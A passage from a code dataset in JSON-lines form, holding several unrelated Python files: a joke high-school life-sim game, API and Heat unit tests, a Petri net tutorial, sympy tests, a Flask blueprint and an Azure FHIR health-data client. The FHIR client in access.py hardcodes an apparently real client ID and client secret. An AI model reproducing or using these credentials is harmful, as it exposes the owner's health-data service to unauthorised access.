print(\"Wow, you really are a loser. Someone saw you eating lunch on the toilet and told the whole school. Popularity down 10 points\")\n self.popularity -=10\n break\n if x=='b':\n print(\"Congrats you were social for once. You actually made some new friends. Popularity up 10 points\")\n self.popularity +=10\n break\n if x =='c':\n print(\"I mean this isn't that sad I guess. Good job for being a good student? Your smarts went up 5 points\")\n self.smarts +=5\n break\n else:\n print(\"Error\")\n elif scenario ==6:\n if 6 not in completed_scenarios:\n completed_scenarios.append(6)\n while True:\n x = input(\"So you are walking down the senior hallway and you see one of them trip you and then look at their friends and laugh. Whats your next move? \\n a= run away crying \\n b= make fun of the senior \\n c= don't say anything and do not make eye contact with anyone for the rest of the year \\n\") \n if x=='a':\n print(\"Are you kidding me? This is the saddest thing ever. Everything is going down 5 points\")\n self.health -= 5\n self.happiness -= 5\n self.popularity -= 5\n self.smarts -= 5\n self.looks -= 5\n break\n if x=='b':\n print(\"You made fun of the senior's ugly haircut causing all his friends to laugh. You gained their respect. Popularity up 10 points\")\n self.popularity += 10\n break\n if x =='c':\n print(\"Um. Ok I guess. This is weird. IDK what to do here so nothing is changing\")\n break\n else:\n print(\"Error\")\n\n elif self.grade == 10:\n while True:\n scenario = random.randint(11,15)\n if scenario not in completed_scenarios:\n break\n if scenario ==11:\n if 11 not in completed_scenarios:\n completed_scenarios.append(11)\n while True:\n x = input(\"Its time for the AutoCad Exam. Are you ready to take it? \\n a = yes \\n b= no \\n\")\n if x=='a':\n print(\"Congrats! You failed. We both know you were not ready! Your smarts went down 5 points for failing and another 5 points for being cocky.\")\n self.smarts -= 10\n break\n if x=='b':\n print(\"Congrats! You failed, but you knew you were going to so since you know yourself so well your smarts went up 10 points\")\n smarts += 10\n break\n else:\n print(\"Error\")\n elif scenario ==12:\n if 12 not in completed_scenarios:\n completed_scenarios.append(12)\n while True:\n x = input(\"As you were on your way to math class you trip and start falling down the stairs. What are you going to do? \\n a= try and catch yourself \\n b= let yourself fall \\n\")\n if x=='a':\n print(\"You only fell down three stairs before you caught yourself. Your friends laughed but there was no injury.Nothing happens\")\n break\n if x=='b':\n print(\"Um so you fell down both flights of stairs and got a black eye and bruised ego. Also, someone took a video and sent it to the whole school. Your popularity and looks went down 5 points\")\n self.popularity -= 5\n self.looks -= 5\n break\n else:\n print(\"Error\")\n elif scenario ==13:\n if 13 not in completed_scenarios:\n completed_scenarios.append(13)\n while True:\n x = input(\"So you went really hard in gym class and failed to notice your pit stains developing. It wasn't until after you changed and put on your school shirt that you saw the dark spots. What is your next move? \\n a= ask someone to borrow a shirt \\n b= walk around with pit stains \\n c= try drying off your shirt with the air dryer \\n\")\n if x=='a':\n print(\"One of your friends lends you their shirt but you still smell so your popularity went down 5 points\")\n self.popularity += 5\n break\n if x=='b':\n print(\"Everyone saw your pit stains and tbh thats just nasty. Popularity down 100 points. Theres no way your coming back from that\")\n self.popularity -= 100\n break\n if x =='c':\n print(\"Nice job thinking on your feet. You got the dark spots to go off. Your smarts went up 10 points\")\n self.smarts += 10\n break\n else:\n print(\"Error\")\n elif scenario ==14:\n if 14 not in completed_scenarios:\n completed_scenarios.append(14)\n while True:\n x = input(\"You are walking down the hallway and stop to tie your shoe. A group of annoying freshman than procceed to trample you. What are you doing? \\n a = hunt every single one of them down and ... \\n b= yell at them \\n c= get over yourself \\n\")\n if x=='a':\n print(\"Um I am now concerned but the police found out your plans because I informed them and they killed you\")\n self.status = \"ded\"\n break\n if x=='b':\n print(\"The freshman were so scared of you that they promised never even to look in your direction again. Your happiness went up 5 points\")\n self.happiness +=5\n break\n if x =='c':\n print(\"Bad decision. Never ever let freshman get away with things. Your popularity went down 5 points\")\n self.popularity -=5\n break\n else:\n print(\"Error\")\n elif scenario ==15:\n if 15 not in completed_scenarios:\n completed_scenarios.append(15)\n while True:\n x = input(\"As you are walking into school you fall into the mud and it now looks like you pooped your pants. Whats your next move? \\n a= cry and call your mom \\n b= run to the bathroom and try to get it off \\n c= put on your gym shorts \\n\")\n if x=='a':\n print(\"Please stop acting like this its disgusting. Popularity down 5 points\")\n self.popularity -=5\n break\n if x=='b':\n print(\"I mean you did not get the stain out but it ended up looking like a cool design so your popularity and smarts go up 10 points\")\n self.popularity +=10\n self.smarts +=10\n break\n if x =='c':\n print(\"Finally, you made a normal decision. However it is a little cold out so your happiness is down 5 points\")\n self.happiness -=5\n break\n else:\n print(\"Error\")\n \n elif self.grade == 11:\n while True:\n scenario = random.randint(21,25)\n if scenario not in completed_scenarios:\n break\n if scenario ==21:\n if 21 not in completed_scenarios:\n completed_scenarios.append(21)\n while True:\n x = input(\"Its SAT time. Did you get a tutor? \\n a= yes \\n b= no \\n\")\n if x=='a':\n print(\"Since you got a tutor you actually did not fail congrats. You might actually go to college. Your smarts went up 10 points\")\n self.smarts += 10\n break\n if x=='b':\n print(\"Why in the world did you not get a tutor? Your smarts went down 10 points\")\n self.smarts -= 10\n break\n else:\n print(\"Error\")\n elif scenario ==22:\n if 22 not in completed_scenarios:\n completed_scenarios.append(22)\n while True:\n x = input(\"Its time to meet with your guidance counselor about your future. Have you filled out the college packet? \\n a = yes \\n b= no \\n c= college packet? \\n\")\n if x=='a':\n print(\"Good you were actually prepared. Smarts are up 5 points\")\n self.smarts += 5\n break\n if x=='b':\n print(\"Not surprising. Your smarts are down 5 points\")\n self.smarts -= 5\n break\n if x =='c':\n print(\"You should not be at this school. \\n Goodbye!\")\n self.status = \"ded\"\n break\n else:\n print(\"Error\")\n elif scenario ==23:\n if 23 not in completed_scenarios:\n completed_scenarios.append(23)\n while True:\n x = input(\"Its spring break and you have not started your Sanservino timeline yet. Are you going to? \\n a= yes \\n b= no \\n c= I already finished \\n\")\n if x=='a':\n print(\"Good thinking. Your smarts went up 10 points\")\n self.smarts += 10\n break\n if x=='b':\n print(\"Honestly don't blame you. The 72 hour challenge is the wave. Your happiness is up 5 points\")\n self.hapinness += 10\n break\n if x =='c':\n print(\"You are the kid no one likes. Your popularity is down 10 points\")\n self.popularity -= 10\n break\n else:\n print(\"Error\")\n elif scenario ==24:\n if 24 not in completed_scenarios:\n completed_scenarios.append(24)\n while True:\n x = input(\"You are working on your favorite project ever. The TECH MIDTERM!!!!! How much do you love it??? \\n a= so much \\n b= so much \\n c= so much \\n\")\n if x=='a':\n print(\"YESSSS. Your happiness is up 10 points\")\n self.happiness += 10\n break\n if x=='b':\n print(\"YESSSS. Your happiness is up 10 points\")\n self.happiness += 10\n break\n if x =='c':\n print(\"YESSSS. Your happiness is up 10 points\")\n self.happiness += 10\n break\n else:\n print(\"Error\")\n elif scenario ==25:\n if 25 not in completed_scenarios:\n completed_scenarios.append(25)\n while True:\n x = input(\"Its me. The game. Just wanted to check in and say hi. IK junior year is rough and your probably struggling so here is 10 points in everything. :) Have a good day \\n a = accept the gift \\n\")\n if x=='a':\n self.health += 10\n self.happiness += 10\n self.popularity += 10\n self.smarts += 10\n self.looks += 10\n break\n else:\n print(\"Error\")\n\n elif self.grade == 12:\n while True:\n scenario = random.randint(31,35)\n if scenario not in completed_scenarios:\n break\n if scenario ==31:\n if 31 not in completed_scenarios:\n completed_scenarios.append(31)\n while True:\n x = input(\"\")\n if x=='a':\n break\n if x=='b':\n break\n if x =='c':\n break\n else:\n print(\"Error\")\n elif scenario ==32:\n if 32 not in completed_scenarios:\n completed_scenarios.append(32)\n while True:\n x = input(\"\")\n if x=='a':\n break\n if x=='b':\n break\n if x =='c':\n break\n else:\n print(\"Error\")\n elif scenario ==33:\n if 33 not in completed_scenarios:\n completed_scenarios.append(33)\n while True:\n x = input(\"\")\n if x=='a':\n break\n if x=='b':\n break\n if x =='c':\n break\n else:\n print(\"Error\")\n elif scenario ==34:\n if 34 not in completed_scenarios:\n completed_scenarios.append(34)\n while True:\n x = input(\"\")\n if x=='a':\n break\n if x=='b':\n break\n if x =='c':\n break\n else:\n print(\"Error\")\n elif scenario ==35:\n if 35 not in completed_scenarios:\n completed_scenarios.append(35)\n while True:\n x = input(\"\")\n if x=='a':\n break\n if x=='b':\n break\n if x =='c':\n break\n else:\n print(\"Error\")\n\n\n def study(self):\n if self.month_total in times_studied:\n print(\"We all know you aint studying more than once a month. Nice try\")\n else:\n times_studied.append(self.month_total)\n print('You went to the library to study like a good boy. Your smarts went up 5 points.')\n self.smarts += 5\n \n def workout(self):\n if self.month_total in times_workedout:\n print(\"You got your swole on so hard you broke the gym. Come back at a later time.\")\n else:\n times_workedout.append(self.month_total)\n while True:\n x = input(\"What are you working on? \\n c = cardio \\n f = flexibility \\n w = weights \\n p = pretend to do something \\n\")\n y = random.randint(1,10)\n if y == 1:\n print(\"Nice job bozo. You injured yourself at the gym. Your health is now down 10 points.\")\n self.health -= 10\n break\n elif x == 'c':\n print(\"The only other time I have you seen you ran that fast is into Wendy's when you heard they were having a deal. But hey your looks and health went up 5 points\")\n self.looks += 5\n self.health += 5\n break\n elif x == 'f':\n print(\"Maybe next time youll actually be able to touch your toes but at least you put in some effort. Your health went up 5 points\")\n self.health += 5\n break\n elif x== 'w':\n print(\"Damn the grind really is real. You actually broke a sweat. Not gonna lie im surprised. Your looks went up 10 points\")\n self.looks += 10\n break\n elif x== 'p':\n print(\"This is lowkey sad but hey what works for you works for me so your happiness went up 5 points.\")\n self.happiness += 5\n break\n else:\n print(\"Error\")\n \ncharacter = Person(input(\"What is your name\"),\"alive\",1,1,9,gender,50,happiness,health,smarts,looks)\n\ncharacter.introduce()\n \nif character.gender == \"alien\":\n print(\"⏁⊑⟒ ☌⟟⍀⌰ ⏃⏁ ⏁⊑⟒ ⏚⍜⍜⏁⊑ ⌇⍜⌰⎅ ⎎⟟⎎⏁⊬ ⏚⍜⋏⎅⌇. ⌰⍜⍜☍ ⟟⋏ ⏁⊑⟒ ☊⍜⍀⋏⟒⍀ ⏁⍜ ⎎⟟⋏⎅ ⏁⊑⟒ ⏁⏃⋏ ⌇⊑⟟⍀⏁.⏁⊑⟒ ☌⍀⟒⏃⏁ ⏃⋏⏁⟟⍾⎍⟟⏁⊬ ⍜⎎ ⋏⍜⏁⊑⟟⋏☌ ⟟⌇ ⏃⌿⌿⏃⍀⟒⋏⏁ ⎎⍀⍜⋔ ⟟⏁⌇ ⏚⟒⟟⋏☌ ⌇⍜ ⎐⟟⌇⟟⏚⌰⟒ ⟟⋏ ⏁⊑⟒ ⏃☊☊⍜⎍⋏⏁⌇ ⍙⟒ ⊑⏃⎐⟒ ⍜⎎ ⏁⊑⟒ ⏚⟒☌⟟⋏⋏⟟⋏☌ ⍜⎎ ⟒⎐⟒⍀⊬ ⋏⏃⏁⟟⍜⋏. ⏁⊑⟟⌇ ⟟⌇ ⎐⟒⍀⊬ ⌿⌰⏃⟟⋏⌰⊬ ⏁⍜ ⏚⟒ ⎅⟟⌇☊⍜⎐⟒⍀⟒⎅ ⟟⋏ ⏁⊑⟒ ⎎⟟⍀⌇⏁ ⌿⏃☌⟒⌇, ⏃⋏⎅ ⌇⍜⋔⟒⏁⟟⋔⟒⌇\")\n character.status = 'ded'\n print('the fbi found you')\n \nwhile character.status == \"alive\":\n if character.month_total ==24:\n character.status = 'graduated'\n break\n if character.month_display == 6:\n character.month_display = 1\n character.grade += 1\n \n if character.health < 0:\n character.health = 0\n if character.health > 100:\n character.health = 100\n if character.happiness < 0:\n character.happiness = 0\n if character.happiness > 100:\n character.happiness = 100\n if character.smarts < 0:\n character.smarts = 0\n if character.smarts > 100:\n character.smarts = 100\n if character.looks < 0:\n character.looks = 0\n if character.looks > 100:\n character.looks = 100\n \n character.stats()\n death_number = random.randint(1,death_chance)\n kill_number = random.randint(1,death_chance)\n if character.health == 0 or death_number == kill_number:\n character.status = \"dead\"\n break\n character.school_scenarios()\n if character.status == \"ded\":\n break\n \n while True:\n print(\"\\n Moves: \\n a = advance a month \\n s = go study at the library \\n w = go workout\")\n move = input(\"What is your next move \\n\")\n if move == 'a':\n print(\"\\n \\n \\n \\n \\n \\n \\n \\n \\n \\n \\n\")\n character.month_up()\n break\n elif move == 's':\n character.study()\n elif move == 'w':\n character.workout()\n else:\n print(\"Error\")\n\nwhile character.status == \"dead\":\n x = random.randint(1,2)\n if x == 1:\n print(\"You died of an advil overdose\")\n break\n if x == 2:\n print(\"You tripped and fell and drowned in the toilet. There was no poop in it though so you are all good\")\n break\nwhile character.status == 'graduated':\n print(\"Congrats you have graduated\")\n break\n\n\n## elif scenario ==36:\n## if 36 not in completed_scenarios:\n## completed_scenarios.append(36)\n## while True:\n## x = input(\"\")\n## if x=='a':\n## break\n## if x=='b':\n## break\n## if x =='c':\n## break\n## else:\n## print(\"Error\")\n","sub_path":"Bitlife.py","file_name":"Bitlife.py","file_ext":"py","file_size_in_byte":23171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"618012147","text":"import unittest\nimport random\nfrom ewt import ewt_app\nfrom conf import config\nfrom ewt.ewt_const import expect_km_names\n\newt_cfg = config.getEWTConfig()\nstudent_name = ewt_cfg.getStudentUser()\nstudent_password = ewt_cfg.getStudentPassword()\nstudent_app = ewt_app.EWTApp(student_name, student_password)\nstudent_app.set_os_version('593')\n\n\nclass CourseServiceTest(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n print(\"# This is class setup\")\n\n @classmethod\n def tearDownClass(cls):\n print(\"# This is class teardown\")\n\n def test_p1_get_km_list(self):\n # step 1, 获取科目列表\n km_result = student_app.study.get_kemulist()\n\n # 检查科目的数量,并打印排序后的列表\n km_names = [k['Name'] for k in km_result['data']]\n print(\"find km count: {}\".format(len(km_names)))\n print(\"origin km names: {}\".format(km_names))\n km_names.sort()\n print(\"sorted km names: {}\".format(km_names))\n\n # 判断期望的科目列表是返回列表的子集\n self.assertLess(set(expect_km_names), set(km_names))\n\n def test_p1_courseservice_get_lesson_detail(self):\n # step 1, 获取科目列表,并随机选取一个科目\n km_result = student_app.study.get_kemulist()\n # 必须从期望的列表中选择,因为获取科目列表接口返回的科目有多余的,这个可以算作是科目列表接口的bug\n km = random.choice([k for k in km_result['data'] if k['Name'] in expect_km_names])\n print(\"random select a km: {}(km={})\".format(km['Name'], km['ID']))\n\n # step 2, 跟据科目获取课程列表,并随机选择一个课程\n course_result = student_app.study.get_knowledge_course(km['ID'])\n # print(course_result)\n course_list = [c for c in course_result['data']['list']]\n course = random.choice(course_list)\n print(\"random select a course: {}(id={})\".format(course['title'], course['id']))\n\n # step 3, 跟据课程获取讲列表,并随机选择一个讲\n course_detail = student_app.study.get_course_detail(course['id'])\n for lesson in course_detail['data']['lessonlist']:\n print(\"{}: {}\".format(lesson['lessonid'], lesson['lessontitle']))\n print(\"-- videolist count: {}\".format(len(lesson['videolist'])))\n lesson = random.choice(course_detail['data']['lessonlist'])\n print(\"random select a lesson: {}(id={})\".format(lesson['lessontitle'], lesson['lessonid']))\n\n # step 4, 调用获取讲详情的接口,并检查返回结果\n lesson_detail = student_app.study.get_lesson_detail(lesson['lessonid'])\n self.assertIn('data', lesson_detail, lesson_detail)\n for lesson in lesson_detail['data']['lessonlist']:\n self.assertIn('lessonid', lesson, \"lesson id not found\")\n self.assertIn('lessontitle', lesson, \"lesson title not found\")\n print(\"{}: {}\".format(lesson['lessonid'], lesson['lessontitle']))\n print(\"-- videolist count: {}\".format(len(lesson['videolist'])))\n","sub_path":"tests/study_tests/app_courseservice_test.py","file_name":"app_courseservice_test.py","file_ext":"py","file_size_in_byte":3092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"422395771","text":"# Petrinet SNAKES tutorial\n\nimport random\nimport tpn\nimport snakes.plugins\nsnakes.plugins.load(tpn, \"snakes.nets\", \"snk\")\nsnakes.plugins.load('gv', 'snakes.nets', 'nets')\nfrom nets import *\nfrom snk import *\n\n\nclass Environment:\n def __init__(self,net,trans,place):\n self.net = net\n self.trans = trans\n self.place = place\n self.reward = 0\n \n def addElement(self, src, dst):\n for p in self.place:\n if src == p.name:\n p.add([(0,dst)])\n \n def step(self, actions):\n self.setActions(actions)\n self.net.step()\n self.reward -= 1\n \"\"\"for t in self.trans[::-1]:\n modes = t.modes()\n if len(modes):\n t.fire(modes[0])\n self.reward -= 1\n for p in self.place:\n tok_remove = []\n for tok in p.tokens:\n if tok[1] == p.name:\n self.reward += 5 \n tok_remove.append(tok)\n p.remove(tok_remove)\"\"\"\n return self.reward#, obs\n \n def setActions(self, actions):\n for i in range(len(actions)):\n myList = ''.join(map(str, (\"a\",i,\"=\",actions[i]))) \n self.net.globals.declare(myList)\n\nn = PetriNet(\"stepper\")\nfor i in range(3) :\n n.add_place(Place(\"p%s\" % i, [dot]))\n n.add_transition(Transition(\"t%s\" % i, min_time=i+1, max_time=i*2+1))\n n.add_input(\"p%s\" % i, \"t%s\" % i, Value(dot))\ninit = n.get_marking()\n\nfilename = \"data/value-\"+str(0)+\".png\"\nn.draw(filename)\n\nn.reset()\nclock = 0.0\nfor i in range(3) :\n [print(\"%s[%s,%s]=%s\" % (t.name, t.min_time, t.max_time, \"#\" if t.time is None else t.time)) for t in n.transition()]\n delay = n.time()\n print(\"[%s]\" % clock, \"delay:\", delay)\n clock += delay\n print(\"[%s] fire: t%s\" % (clock, i))\n n.transition(\"t%s\" % i).fire(Substitution())\n\nn.set_marking(init)\nclock = 0.0\nfor i in range(3) :\n [print(\"%s[%s,%s]=%s\" % (t.name, t.min_time, t.max_time, \"#\" if t.time is None else t.time)) for t in n.transition()]\n for j in range(2) :\n delay = n.time()\n print(\"[%s]\" % clock, \"delay:\", delay)\n clock += delay\n print(\"[%s] fire: t%s\" % (clock, i))\n n.transition(\"t%s\" % i).fire(Substitution())\n\"\"\"\ndef envFactory():\n n = PetriNet(\"N\")\n p = [Place(\"p0\", []),\\\n Place(\"p1\", []),\\\n Place(\"p2\", []),\\\n Place(\"p3\", []),\\\n Place(\"p4\", [])]\n t = [Transition(\"t0\", min_time=2, max_time=4),\\\n Transition(\"t1\", min_time=2, max_time=4),\\\n Transition(\"t2\", min_time=2, max_time=4),\\\n Transition(\"t3\", min_time=2, max_time=4),\\\n Transition(\"t4\", min_time=2, max_time=4)]\n# Transition(\"t4\", Expression(\"a1 == 1\"), min_time=2, max_time=4)]\n [n.add_place(p_) for p_ in p]\n [n.add_transition(t_) for t_ in t]\n \n n.add_input(\"p0\", \"t0\", Tuple((Variable(\"x\"), Variable(\"y\"))))\n n.add_output(\"p1\", \"t0\", Tuple((Expression(\"x+1\"), Variable(\"y\"))))\n n.add_input(\"p1\", \"t1\", Tuple((Variable(\"x\"), Variable(\"y\"),Variable(\"a1\"))))\n n.add_output(\"p2\", \"t1\", Tuple((Expression(\"x+1\"), Variable(\"y\"))))\n n.add_input(\"p2\", \"t2\", Tuple((Variable(\"x\"), Variable(\"y\"),Variable(\"a2\"))))\n n.add_output(\"p3\", \"t2\", Tuple((Expression(\"x+1\"), Variable(\"y\"))))\n n.add_input(\"p3\", \"t3\", Tuple((Variable(\"x\"), Variable(\"y\"),Variable(\"a3\"))))\n n.add_output(\"p4\", \"t3\", Tuple((Expression(\"x+1\"), Variable(\"y\"))))\n n.add_input(\"p1\", \"t4\", Tuple((Variable(\"x\"), Variable(\"y\"),Variable(\"a1\"))))\n n.add_output(\"p4\", \"t4\", Tuple((Expression(\"x+4\"), Variable(\"y\"))))\n return Environment(n, t, p)\n \n \nenv = envFactory()#[(0,'p4',0) for _ in range(10)])\n\nprint(env.net.get_marking())\nfor _ in range(5):\n env.addElement('p0','p4')\nprint(env.net.get_marking())\n#filename = \"data/value-\"+str(0)+\".png\"\n#env.net.draw(filename)\nfor i in range(15):\n actions = [0,random.choice([0,1]),0,0,0]\n cummulative_reward = env.step(actions)\n print(cummulative_reward)\n #filename = \"data/value-\"+str(i+1)+\".png\"\n #env.net.draw(filename)\n \"\"\"","sub_path":"old/main_with_time.py","file_name":"main_with_time.py","file_ext":"py","file_size_in_byte":4093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"549023565","text":"import requests\nimport json\nfrom datetime import datetime\n\nclass Connect():\n CLIENT_ID = \"0f6332f4-c060-49fc-bcf6-548982d56569\"\n CLIENT_SECRET = \"ux@CJAaxCD85A9psm-Wdb?x3/Z4c6gp9\"\n SCOPE = \"https://gosh-fhir-synth.azurehealthcareapis.com/.default\"\n FHIR_BASE_URL = \"https://gosh-fhir-synth.azurehealthcareapis.com\"\n payload = \"grant_type=client_credentials&client_id={}&client_secret={}&scope={}\".format(CLIENT_ID, CLIENT_SECRET, SCOPE)\n url = \"https://login.microsoftonline.com/ca254449-06ec-4e1d-a3c9-f8b84e2afe3f/oauth2/v2.0/token\"\n headers = { 'content-type': \"application/x-www-form-urlencoded\" }\n api_url = \"https://json-fhir-tool.azurewebsites.net/api/json-fhir-tool\"\n\n def get_access_token(self): \n res = requests.post(Connect.url, Connect.payload, headers=Connect.headers)\n if res.status_code == 200:\n response_json = res.json()\n return response_json.get('access_token', None)\n\n def submit_blood_pressure(self, patient_id, systolic, diastolic):\n date = datetime.now().strftime(\"%Y-%m-%dT%H:%M:%S.%fz\")\n token = self.get_access_token()\n body = {\n 'token': token, \n \"fhir_url\": \"https://gosh-fhir-synth.azurehealthcareapis.com\", \n \"date\": date, \n \"systolic\": int(systolic), \n \"diastolic\": int(diastolic), \n \"patient_id\": patient_id, \n \"type\": \"bloodpressure\"\n }\n fhir = requests.post(Connect.api_url, json=body)\n if fhir.status_code == 200:\n if self.post_to_FHIR(fhir.json(), token) == 201:\n return body\n\n\n def submit_heart_rate(self, patient_id, heart_rate):\n date = datetime.now().strftime(\"%Y-%m-%dT%H:%M:%S.%fz\")\n token = self.get_access_token()\n body = {\n \"token\": token, \n \"fhir_url\": \"https://gosh-fhir-synth.azurehealthcareapis.com\", \n \"date\": date, \n \"heartrate\": int(heart_rate), \n \"patient_id\": patient_id, \n \"type\": \"heartrate\"\n }\n fhir = requests.post(Connect.api_url, json=body)\n if fhir.status_code == 200:\n if self.post_to_FHIR(fhir.json(), token) == 201:\n return body\n \n def post_to_FHIR(self, data, token):\n observation_url = \"https://gosh-fhir-synth.azurehealthcareapis.com/Observation\"\n status = requests.post(observation_url, json=data, headers={'content-type': \"application/json\", 'Authorization': 'Bearer ' + token})\n return status.status_code\n\n\n ","sub_path":"access.py","file_name":"access.py","file_ext":"py","file_size_in_byte":2560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"293674128","text":"# vim: tabstop=4 shiftwidth=4 softtabstop=4\n\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\n\nfrom heat.engine import environment\nfrom heat.engine import resource\nfrom heat.engine.resources import template_resource\n\nfrom heat.tests import generic_resource as generic_rsrc\nfrom heat.tests.common import HeatTestCase\n\n\nclass MyCloudResource(generic_rsrc.GenericResource):\n pass\n\n\nclass ProviderTemplateTest(HeatTestCase):\n def setUp(self):\n super(ProviderTemplateTest, self).setUp()\n resource._register_class('OS::ResourceType',\n generic_rsrc.GenericResource)\n resource._register_class('myCloud::ResourceType',\n MyCloudResource)\n\n def test_get_os_empty_registry(self):\n # assertion: with an empty environment we get the correct\n # default class.\n env_str = {'resource_registry': {}}\n env = environment.Environment(env_str)\n cls = resource.get_class('OS::ResourceType', 'fred', env)\n self.assertEqual(cls, generic_rsrc.GenericResource)\n\n def test_get_mine_global_map(self):\n # assertion: with a global rule we get the \"mycloud\" class.\n env_str = {'resource_registry': {\"OS::*\": \"myCloud::*\"}}\n env = environment.Environment(env_str)\n cls = resource.get_class('OS::ResourceType', 'fred', env)\n self.assertEqual(cls, MyCloudResource)\n\n def test_get_mine_type_map(self):\n # assertion: with a global rule we get the \"mycloud\" class.\n env_str = {'resource_registry': {\n \"OS::ResourceType\": \"myCloud::ResourceType\"}}\n env = environment.Environment(env_str)\n cls = resource.get_class('OS::ResourceType', 'fred', env)\n self.assertEqual(cls, MyCloudResource)\n\n def test_get_mine_resource_map(self):\n # assertion: with a global rule we get the \"mycloud\" class.\n env_str = {'resource_registry': {'resources': {'fred': {\n \"OS::ResourceType\": \"myCloud::ResourceType\"}}}}\n env = environment.Environment(env_str)\n cls = resource.get_class('OS::ResourceType', 'fred', env)\n self.assertEqual(cls, MyCloudResource)\n\n def test_get_os_no_match(self):\n # assertion: make sure 'fred' doesn't match 'jerry'.\n env_str = {'resource_registry': {'resources': {'jerry': {\n \"OS::ResourceType\": \"myCloud::ResourceType\"}}}}\n env = environment.Environment(env_str)\n cls = resource.get_class('OS::ResourceType', 'fred', env)\n self.assertEqual(cls, generic_rsrc.GenericResource)\n\n def test_get_template_resource(self):\n # assertion: if the name matches {.yaml|.template} we get the\n # TemplateResource class.\n env_str = {'resource_registry': {'resources': {'fred': {\n \"OS::ResourceType\": \"some_magic.yaml\"}}}}\n env = environment.Environment(env_str)\n cls = resource.get_class('OS::ResourceType', 'fred', env)\n self.assertEqual(cls, template_resource.TemplateResource)\n","sub_path":"heat/tests/test_provider_template.py","file_name":"test_provider_template.py","file_ext":"py","file_size_in_byte":3533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"585458766","text":"import sympy\nimport Library_SympyExpressionRestrictVariables\nimport Library_TestLooper\nimport Library_StringExpressionToSympyExpression\nimport Library_SympyExpressionEquality\nimport copy\n\n\n\n#Create some variables:\npi = sympy.pi\nx = sympy.Symbol('x')\nn = sympy.Symbol('n')\nT = sympy.Symbol('T')\n\n#Create a copy with the main variable restricted\nx_restricted = sympy.Symbol('x', real=True)\nn_restricted = sympy.Symbol('n', real=True)\nT_restricted = sympy.Symbol('T', real=True)\n\n#Create a basic sympy expression of more than 1 variable\nFourierBasisExpression = sympy.sin(n*pi*x/T )\nFourierBasisExpressionRestrictedX = sympy.sin( n*pi*x_restricted/ T )\nFourierBasisExpressionRestrictedNXT = sympy.sin( n_restricted*pi*x_restricted/ T_restricted )\n\nArgSetExpectedResultCombos = []\nArgSetExpectedResultCombos.append(\n (\n \n {\n \"SympyExpression\": FourierBasisExpression, \n \"Restrictions\": {'real':True}, \n \"VariableNames\": ['x', 'z'] #No z exists in the expression -> should throw error\n }\n , \n Exception('')\n )\n)\n\nArgSetExpectedResultCombos.append(\n (\n \n {\n \"SympyExpression\": FourierBasisExpression, \n \"Restrictions\": {'real':True}, \n \"VariableNames\": ['x']\n }\n , \n FourierBasisExpressionRestrictedX\n )\n)\n\nArgSetExpectedResultCombos.append(\n (\n \n {\n \"SympyExpression\": FourierBasisExpressionRestrictedX, \n \"Restrictions\": None, \n \"VariableNames\": ['x']\n }\n , \n FourierBasisExpression\n )\n)\n\nArgSetExpectedResultCombos.append(\n (\n \n {\n #Remove all restrictions\n \"SympyExpression\": FourierBasisExpressionRestrictedNXT, \n \"Restrictions\": None, \n \"VariableNames\": None\n }\n , \n FourierBasisExpression\n )\n)\n\nArgSetExpectedResultCombos.append(\n (\n \n {\n #Remove all restrictions\n \"SympyExpression\": FourierBasisExpressionRestrictedNXT, \n \"Restrictions\": None, \n \"VariableNames\": None\n }\n , \n FourierBasisExpression\n )\n)\n\n\nLoopResult = Library_TestLooper.Main(\n FunctionToTest = Library_SympyExpressionRestrictVariables.Main,\n ArgSetExpectedResultCombos = ArgSetExpectedResultCombos,\n OrderOfMagnitudeRatioMax = 0.1,\n HardDifferenceMax = 1.0,\n DoEqualityCheck = True,\n DoContainmentCheck = False,\n MinFlatResultLength = None,\n MaxFlatResultLength = None,\n ResultOrderMatters = True, \n EqualityCheckFunction = Library_SympyExpressionEquality.Main,\n PrintExtra = True,\n)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"Test_SympyExpressionRestrictVariables.py","file_name":"Test_SympyExpressionRestrictVariables.py","file_ext":"py","file_size_in_byte":2712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"533490895","text":"from flask import Blueprint\n\nfrom .decorators import http_cache, templated\nfrom .models import Project\n\nprojects = Blueprint('projects', __name__, url_prefix='/projects')\n\n\n@projects.route('')\n@http_cache()\n@templated()\ndef index():\n projects = Project.query.filter_by(is_active=True).order_by(Project.name)\n return {'projects': projects}\n\n\n@projects.route('/')\n@http_cache()\n@templated()\ndef detail(name):\n return {\n 'project': Project.query.filter_by(name=name).first_or_404()\n }\n","sub_path":"jazzband/projects.py","file_name":"projects.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"266909068","text":"# query.py\nimport json\n\ndef query(query_type, q):\n\tif query_type not in ('count', ):\n\t\tprint('query type not yet supported')\n\t\treturn None\n\tcount = 0\n\tfor _class in data['classes']:\n\t\tfor student in _class['students']:\n\t\t\tif student['name'].lower() == q.lower():\n\t\t\t\tcount += 1\n\n\treturn count\n\n\ndef group_by_name(class_name):\n\treturn_this = {}\n\tfor _class in data['classes']:\n\t\tif _class['name'] != class_name:\n\t\t\tcontinue\n\t\tfor student in _class['students']:\n\t\t\tstudent_name = student['name']\n\t\t\tif student_name not in return_this:\n\t\t\t\treturn_this[student_name] = 0\n\t\t\treturn_this[student_name] += 1\n\t\tbreak\n\n\treturn return_this\n\n\n\n\nif __name__ == '__main__':\n\tdata = None\n\twith open('in.json') as json_obj:\n\t\tdata = 